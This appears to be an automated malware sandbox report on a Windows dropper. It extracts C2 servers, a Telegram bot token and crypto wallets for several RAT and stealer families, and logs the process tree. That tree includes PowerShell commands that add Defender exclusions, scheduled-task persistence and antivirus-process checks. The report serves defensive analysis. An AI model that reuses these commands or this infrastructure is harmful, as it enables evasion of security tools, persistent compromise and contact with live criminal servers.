Analysis
-
max time kernel
351s -
max time network
447s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
18-11-2024 12:18
Errors
Reason
Machine shutdown
General
-
Target
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Score
10/10
Malware Config
Extracted
Family
xworm
Version
5.0
C2
event-dollar.gl.at.ply.gg:42627
178.215.224.96:7886
Mutex
Vu8KDOzYd19RAWuh
Attributes
-
Install_directory
%ProgramData%
-
install_file
Desktop Window Manager.exe
-
telegram
https://api.telegram.org/bot7269786725:AAF0IPx1BWTdW_vbZqP8HGNrxWWFpF5CvYs/sendMessage?chat_id=5465523859
aes.plain
aes.plain
Extracted
Family
metasploit
Version
windows/reverse_http
C2
http://89.197.154.116:7810/dyn9SR6mQII2UzdSUKnrgwmYhskiaUB7jCBFjro2bJG8g6R2zHny4Po9miA-BSg8o5YtsnonLxNAPh2rwk7sISKT6cj
Extracted
Family
phorphiex
C2
http://185.215.113.66/
http://91.202.233.141/
Wallets
0xCa90599132C4D88907Bd8E046540284aa468a035
TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6
qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
XryzFMFVpDUvU7famUGf214EXD3xNUSmQf
rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9
AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z
LdgchXq1sKbAaAJ1EXAPSRBzLb8jnTZstT
MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q
4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK
15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC
1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK
ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp
3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc
3ESHude8zUHksQg1h6hHmzY79BS36L91Yn
DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA
t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh
stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj
bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2
bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr
bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd
Attributes
-
mutex
753f85d83d
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Extracted
Family
asyncrat
Version
Venom RAT + HVNC + Stealer + Grabber v6.0.2
Botnet
Crypted
C2
154.216.20.190:4449
Mutex
iwrodgxclqca
Attributes
-
delay
1
-
install
false
-
install_folder
%AppData%
aes.plain
Extracted
Family
phorphiex
C2
http://185.215.113.66
http://185.215.113.84
Attributes
-
mutex
Klipux
Extracted
Family
quasar
Version
1.4.1
Botnet
Office04
C2
192.168.1.101:4782
Mutex
20f2b2b5-8392-4fbe-9585-0778c516b863
Attributes
-
encryption_key
3A9499E06EC8E749CF7AE8F7D466BD97D9B2380C
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
Family
quasar
Version
1.4.1
Botnet
rat1
C2
unitedrat.ddns.net:4782
Mutex
5100ab61-a5a5-407f-af55-9e7766b9d637
Attributes
-
encryption_key
AB7A97D9E0F9B0A44190A0D500EAB7AF37629802
-
install_name
System32.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
System32
-
subdirectory
System32
Extracted
Family
asyncrat
Version
AsyncRAT
Botnet
Default
C2
yyyson22.gleeze.com:4608
Mutex
dw
Attributes
-
delay
3
-
install
false
-
install_folder
%AppData%
aes.plain
Extracted
Family
quasar
Version
1.4.1
Botnet
Aquarius
C2
192.168.8.103:4782
192.168.8.105:4782
192.168.8.114:4782
Mutex
a198a147-9efc-419d-9539-bac2108dc109
Attributes
-
encryption_key
4CF458F992C472DE78F317085B34A8A1747FC32D
-
install_name
WindowsDataUpdater.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
WindowsDataUpdater
-
subdirectory
WinBioData
Extracted
Family
redline
C2
38.180.109.140:20007
Extracted
Family
asyncrat
Version
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Botnet
Default
C2
62.113.117.95:4449
Mutex
hwelcvbupaqfzors
Attributes
-
delay
10
-
install
false
-
install_folder
%AppData%
aes.plain
Extracted
Family
redline
Botnet
@OLEH_PSP
C2
65.21.18.51:45580
Extracted
Family
lumma
C2
https://c0al1t1onmatch.cyou/api
Signatures
-
Ammyy Admin
Remote admin tool with various capabilities.
-
AmmyyAdmin payload 1 IoCs
-
Ammyyadmin family
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Asyncrat family
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Detect Xworm Payload 3 IoCs
-
FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
-
Flawedammyy family
-
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
-
Lumma family
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Metasploit family
-
Modifies security service 2 TTPs 1 IoCs
-
Njrat family
-
Phorphiex family
-
Phorphiex payload 4 IoCs
-
Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar family
-
Quasar payload 13 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
-
Redline family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
-
Windows security bypass 2 TTPs 6 IoCs
-
Xmrig family
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
DCRat payload 1 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
XMRig Miner payload 6 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 6 IoCs
-
Executes dropped EXE 64 IoCs
-
Loads dropped DLL 64 IoCs
-
Themida packer 3 IoCs
Detects Themida, an advanced Windows software protection system.
-
Windows security modification 2 TTPs 7 IoCs
-
Adds Run key to start application 2 TTPs 64 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 64 IoCs
-
Enumerates processes with tasklist 1 TTPs 6 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 14 IoCs
-
UPX packed file 42 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 2 IoCs
-
Drops file in Windows directory 16 IoCs
-
Launches sc.exe 15 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Detects Pyinstaller 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Program crash 2 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 13 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Delays execution with timeout.exe 64 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 34 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies system certificate store 2 TTPs 17 IoCs
-
Runs ping.exe 1 TTPs 13 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 13 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"C:\Users\Admin\AppData\Local\Temp\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"2⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Desktop Window Manager.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Desktop Window Manager.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Desktop Window Manager" /tr "C:\ProgramData\Desktop Window Manager.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\AnneSalt.exe"C:\Users\Admin\AppData\Local\Temp\Files\AnneSalt.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Technique Technique.cmd & Technique.cmd & exit4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 795565⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "SpecificationsRemainExtraIntellectual" Compile5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Cruz + Occupations + Grab + Recovery 79556\J5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\79556\Boxing.pifBoxing.pif J5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cheet.exe"C:\Users\Admin\AppData\Local\Temp\Files\cheet.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Extension.exe"C:\Users\Admin\AppData\Local\Temp\Files\Extension.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tdrpl.exe"C:\Users\Admin\AppData\Local\Temp\Files\tdrpl.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\2112426607.exeC:\Users\Admin\AppData\Local\Temp\2112426607.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2066714726.exeC:\Users\Admin\AppData\Local\Temp\2066714726.exe5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\122013609.exeC:\Users\Admin\AppData\Local\Temp\122013609.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\2176826517.exeC:\Users\Admin\AppData\Local\Temp\2176826517.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\2249324499.exeC:\Users\Admin\AppData\Local\Temp\2249324499.exe5⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Yellow%20Pages%20Scraper.exe"C:\Users\Admin\AppData\Local\Temp\Files\Yellow%20Pages%20Scraper.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\Files\shttpsr_mg.exe"C:\Users\Admin\AppData\Local\Temp\Files\shttpsr_mg.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\Files\VidsUsername.exe"C:\Users\Admin\AppData\Local\Temp\Files\VidsUsername.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Recreation Recreation.bat & Recreation.bat4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 1951975⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "RESOLVEPHONESBLESSFRANK" Donated5⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Arthritis + ..\Canyon + ..\Knights + ..\Movies + ..\Sequence + ..\Nascar + ..\Solve + ..\Cio + ..\Strategy + ..\Amounts + ..\Hans + ..\America + ..\Provincial + ..\Downtown + ..\Browser + ..\Afford + ..\Info + ..\Ll + ..\Intersection + ..\Rj + ..\Poetry + ..\Reality + ..\Cliff l5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\195197\Earl.pifEarl.pif l5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\195197\Earl.pifC:\Users\Admin\AppData\Local\Temp\195197\Earl.pif6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\5_6190317556063017550.exe"C:\Users\Admin\AppData\Local\Temp\Files\5_6190317556063017550.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\Files\test.exe"C:\Users\Admin\AppData\Local\Temp\Files\test.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\Temp\{E55FC849-5D25-4B2D-9102-ED76D32DDEDF}\.cr\test.exe"C:\Windows\Temp\{E55FC849-5D25-4B2D-9102-ED76D32DDEDF}\.cr\test.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\Files\test.exe" -burn.filehandle.attached=180 -burn.filehandle.self=1884⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\Temp\{08F1EDA7-978C-484C-97CE-EB6EE2B3A4B9}\.ba\DZIPR.exe"C:\Windows\Temp\{08F1EDA7-978C-484C-97CE-EB6EE2B3A4B9}\.ba\DZIPR.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\DaemonauthQVX_alpha_3\DZIPR.exeC:\Users\Admin\AppData\Local\DaemonauthQVX_alpha_3\DZIPR.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe8⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\osupdater.exe"C:\Users\Admin\AppData\Local\Temp\Files\osupdater.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\audiodg.exe"C:\Windows\system32\audiodg.exe"4⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2656 -s 205⤵
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2628 -s 205⤵
-
-
-
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe"4⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1792 -s 1845⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\LummaC22222.exe"C:\Users\Admin\AppData\Local\Temp\Files\LummaC22222.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Gorebox%20ModMenu%201.2.0.exe"C:\Users\Admin\AppData\Local\Temp\Files\Gorebox%20ModMenu%201.2.0.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Journal-https.exe"C:\Users\Admin\AppData\Local\Temp\Files\Journal-https.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Files\msf.exe"C:\Users\Admin\AppData\Local\Temp\Files\msf.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Iwobk6EfwemE.bat" "5⤵
-
C:\Windows\system32\chcp.comchcp 650016⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Yv5TxrJ4uI3Y.bat" "7⤵
-
C:\Windows\system32\chcp.comchcp 650018⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"8⤵
- Executes dropped EXE
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\6KfpgIUGgmjK.bat" "9⤵
-
C:\Windows\system32\chcp.comchcp 6500110⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"10⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\24oC3rC5RSxE.bat" "11⤵
-
C:\Windows\system32\chcp.comchcp 6500112⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\welwxdmcMZQV.bat" "13⤵
-
C:\Windows\system32\chcp.comchcp 6500114⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"14⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\3OVzd9vfHoyo.bat" "15⤵
-
C:\Windows\system32\chcp.comchcp 6500116⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"16⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\MnFcXnUAPPCO.bat" "17⤵
-
C:\Windows\system32\chcp.comchcp 6500118⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"18⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8Wn3SbdPLyD4.bat" "19⤵
-
C:\Windows\system32\chcp.comchcp 6500120⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
